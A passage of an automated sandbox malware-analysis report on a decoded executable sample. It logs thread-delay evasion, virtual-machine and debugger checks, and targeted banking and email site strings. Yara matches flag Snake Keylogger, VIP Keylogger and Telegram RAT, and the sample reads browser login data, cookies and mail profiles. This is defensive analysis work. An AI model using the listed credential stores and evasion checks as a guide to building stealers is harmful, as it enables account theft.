                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597750Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597641Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597502Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597369Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597250Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597123Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597016Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596891Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596768Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596641Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596531Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596422Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596313Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596203Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596094Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595969Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594235Jump to behavior
                          Source: Amcache.hve.12.drBinary or memory string: VMware
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                          Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                          Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                          Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                          Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                          Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                          Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                          Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                          Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                          Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                          Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1509663573.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                          Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_06708688 LdrInitializeThunk,0_2_06708688
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeQueries volume information: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Snake Keylogger
                          Source: Yara matchFile source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
                          Yara detected VIP Keylogger
                          Source: Yara matchFile source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Yara matchFile source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Snake Keylogger
                          Source: Yara matchFile source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Yara detected Telegram RAT
